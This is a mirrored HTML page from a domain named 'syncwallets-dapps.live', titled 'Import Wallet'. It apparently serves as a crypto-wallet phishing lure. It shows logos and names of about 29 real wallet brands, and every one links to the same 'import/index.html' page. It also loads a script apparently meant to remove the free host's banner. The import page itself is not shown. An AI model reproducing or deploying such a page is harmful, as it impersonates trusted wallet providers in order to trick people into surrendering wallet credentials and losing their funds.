<!DOCTYPE html>
<html lang="en">



<!-- Mirrored from syncwallets-dapps.live/walletconnect/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 24 Dec 2021 11:25:27 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
<script src="removeBanner.js"></script>.
<meta charset="UTF-8" />
<title>Import Wallet</title>
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<link rel="stylesheet" href="assets/css/style.css" />
<link rel="preconnect" href="https://fonts.gstatic.com/" />
<link href="https://fonts.googleapis.com/css2?family=Lato:wght@100;300;400;700;900&amp;display=swap" rel="stylesheet" />
</head>
<body style="background-color: rgb(65, 141, 241)">
<div class="main-body">
<div class="container">
<h3 class="text-center" style="margin-bottom: 20px">
Connect your wallet
</h3>
<a href="import/index.html" class="wallet">
<p class="wallet_name">WalletConnect</p>
<img class="wallet__image" src="assets/images/icn-wallet-connect.svg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">TrustWallet</p>
<img class="wallet__image" src="assets/images/icn-trust-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">MetaMask</p>
<img class="wallet__image" src="assets/images/icn-meta-mask.svg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Coinbase Wallet</p>
<img class="wallet__image" src="assets/images/icn-coinbase.svg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Ledger</p>
<img class="wallet__image" src="assets/images/icn-ledger.svg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Trezor</p>
<img class="wallet__image" src="assets/images/icn-trezor.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Formatic</p>
<img class="wallet__image" src="assets/images/icn-formatic.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Portis</p>
<img class="wallet__image" src="assets/images/icn-portis.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Token pocket</p>
<img class="wallet__image" src="assets/images/icn-token-pocket.jpg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Coinmoni Wallet</p>
<img class="wallet__image" src="assets/images/icn-coinmoni-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">AAVE Wallet</p>
<img class="wallet__image" src="assets/images/icn-aave-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Monero Wallet</p>
<img class="wallet__image" src="assets/images/icn-monero-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Binance Smart Wallet</p>
<img class="wallet__image" src="assets/images/icn-binance-smart-chain.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Digitex Wallet</p>
<img class="wallet__image" src="assets/images/icn-digitx-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Atomic Wallet</p>
<img class="wallet__image" src="assets/images/icn-atomic-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Enjin Wallet</p>
<img class="wallet__image" src="assets/images/icn-enjin-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Eidoo Wallet</p>
<img class="wallet__image" src="assets/images/icn-eidoo-wallet.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Protocol</p>
<img class="wallet__image" src="assets/images/icn-protocol.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Squarelink</p>
<img class="wallet__image" src="assets/images/icn-squarelink.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Torus</p>
<img class="wallet__image" src="assets/images/icn-torus.jpg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Exodus</p>
<img class="wallet__image" src="assets/images/exodus.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Ronin</p>
<img class="wallet__image" src="assets/images/ronin.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Safepal</p>
<img class="wallet__image" src="assets/images/safe.jpg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Infinity</p>
<img class="wallet__image" src="assets/images/infi.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Solflare</p>
<img class="wallet__image" src="assets/images/sof.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Kucoin</p>
<img class="wallet__image" src="assets/images/kucoin.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Phantom</p>
<img class="wallet__image" src="assets/images/phantom.png" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Sollet</p>
<img class="wallet__image" src="assets/images/sollet.jpg" alt="wallet_img" />
</a>
<a href="import/index.html" class="wallet">
<p class="wallet_name">Authereum</p>
<img class="wallet__image" src="assets/images/icn-authereum.svg" alt="wallet_img" />
</a>
<a href="#" class="deactivate"> Deactivate </a>
<br />
<br />
 </div>
</div>
<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&amp;utm_campaign=000_logo&amp;utm_medium=website&amp;utm_content=footer_img"><img src="../../cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(t){for(var e=t+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(e))return i.substring(e.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var wordpressAdminBody=document.getElementsByClassName("wp-admin")[0],notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0];if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Roboto:300,400,600,700",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 100%; }} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); max-width: 350px; border: 0; border-radius: 3px; background-color: #ff4546 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&amp;utm_medium=panel&amp;utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">Go for it</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),notification.className="notice notice-error is-dismissible";var mainContentHolder=document.getElementById("main_content");mainContentHolder.setAttribute("style","padding: 0;"),hostingerLogo[0].remove();var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.className="000-h1",h1Tag.innerHTML="Black Friday Prices",h1Tag.setAttribute("style",'color: white; font-family: "Roboto", sans-serif; font-size: 22px; font-weight: 700; text-transform: uppercase;');var h2Tag=document.createElement("H2");h2Tag.innerHTML="Get 90% Off!",h2Tag.setAttribute("style",'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 60px; font-weight: 700; line-height: 1;'),h1Tag.parentNode.insertBefore(h2Tag,h1Tag.nextSibling);var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Get Web Hosting for $0.99/month + SSL Certificate for FREE!",paragraph.setAttribute("style",'font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 700; margin-bottom: 15px;');var list=notification.getElementsByTagName("UL")[0];list.remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2020-wp-inject-img.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script></body>


<!-- Mirrored from syncwallets-dapps.live/walletconnect/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 24 Dec 2021 11:25:45 GMT -->
</html>